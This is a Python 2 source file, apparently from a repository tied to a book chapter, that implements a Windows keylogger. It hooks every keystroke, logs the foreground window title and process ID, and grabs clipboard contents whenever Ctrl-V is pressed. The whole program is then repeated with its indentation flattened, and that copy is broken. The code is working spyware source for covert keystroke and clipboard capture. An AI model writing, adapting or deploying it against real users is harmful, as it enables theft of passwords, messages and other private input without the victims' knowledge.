dragonken/ch8_windows_keylogger.py

## ch8_windows_keylogger.py
from ctypes import *
import pyHook
import pythoncom
import win32clipboard
import sys


current_window = None
current_command = False
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi

def get_current_process():
    #Window handle
    handle_window = user32.GetForegroundWindow()

    #Get Window Title Name
    window_title = create_string_buffer("\x00" * 512)
    user32.GetWindowTextA(handle_window, byref(window_title), 512)
    window_title_value = window_title.value

    #Get Process ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(handle_window, byref(pid))
    pid_value = pid.value

    #Get Executable Name
    #executable = create_string_buffer(b"\x00" * 512)
    #handle_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    #psapi.GetModuleBaseNameA(handle_process, False, byref(executable), 512)
    #executable_value = executable.value

    kernel32.CloseHandle(handle_window)
    #kernel32.CloseHandle(handle_process)

    return (window_title_value, pid_value)

def keyStroke(event):
    global current_window
    global current_command

    #Get Window Name and Process Decription from the hooked event
    if event.WindowName != current_window:
        current_window = event.WindowName
        process_info = get_current_process()
        print "\n\n%s - %s" % (process_info[0], process_info[1])

    #Check if Left Control is pressed
    if event.Key == "Lcontrol":
        current_command = True
        print "[%s]" % event.Key,
    else:
        #Get Clipboard data if CTRL-V
        if current_command and event.Key == "V":
            current_command = False
            win32clipboard.OpenClipboard()
            pasted_data = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE] - %s" % pasted_data,
        #Exit KeyLogger if CTRL-~
        if current_command and event.Key == "Oem_3":
            current_command = False
            print "\nExiting KeyLogger"
            sys.exit(0)
        else:
            print "[%s]" % event.Key,

    return True

#Register Hooks
k1 = pyHook.HookManager()
k1.KeyDown = keyStroke

k1.HookKeyboard()
pythoncom.PumpMessages()
	from ctypes import *
	import pyHook
	import pythoncom
	import win32clipboard
	import sys


	current_window = None
	current_command = False
	user32 = windll.user32
	kernel32 = windll.kernel32
	psapi = windll.psapi

	def get_current_process():
	#Window handle
	handle_window = user32.GetForegroundWindow()

	#Get Window Title Name
	window_title = create_string_buffer("\x00" * 512)
	user32.GetWindowTextA(handle_window, byref(window_title), 512)
	window_title_value = window_title.value

	#Get Process ID
	pid = c_ulong(0)
	user32.GetWindowThreadProcessId(handle_window, byref(pid))
	pid_value = pid.value

	#Get Executable Name
	#executable = create_string_buffer(b"\x00" * 512)
	#handle_process = kernel32.OpenProcess(0x400 \| 0x10, False, pid)
	#psapi.GetModuleBaseNameA(handle_process, False, byref(executable), 512)
	#executable_value = executable.value

	kernel32.CloseHandle(handle_window)
	#kernel32.CloseHandle(handle_process)

	return (window_title_value, pid_value)

	def keyStroke(event):
	global current_window
	global current_command

	#Get Window Name and Process Decription from the hooked event
	if event.WindowName != current_window:
	current_window = event.WindowName
	process_info = get_current_process()
	print "\n\n%s - %s" % (process_info[0], process_info[1])

	#Check if Left Control is pressed
	if event.Key == "Lcontrol":
	current_command = True
	print "[%s]" % event.Key,
	else:
	#Get Clipboard data if CTRL-V
	if current_command and event.Key == "V":
	current_command = False
	win32clipboard.OpenClipboard()
	pasted_data = win32clipboard.GetClipboardData()
	win32clipboard.CloseClipboard()
	print "[PASTE] - %s" % pasted_data,
	#Exit KeyLogger if CTRL-~
	if current_command and event.Key == "Oem_3":
	current_command = False
	print "\nExiting KeyLogger"
	sys.exit(0)
	else:
	print "[%s]" % event.Key,

	return True

	#Register Hooks
	k1 = pyHook.HookManager()
	k1.KeyDown = keyStroke

	k1.HookKeyboard()
	pythoncom.PumpMessages()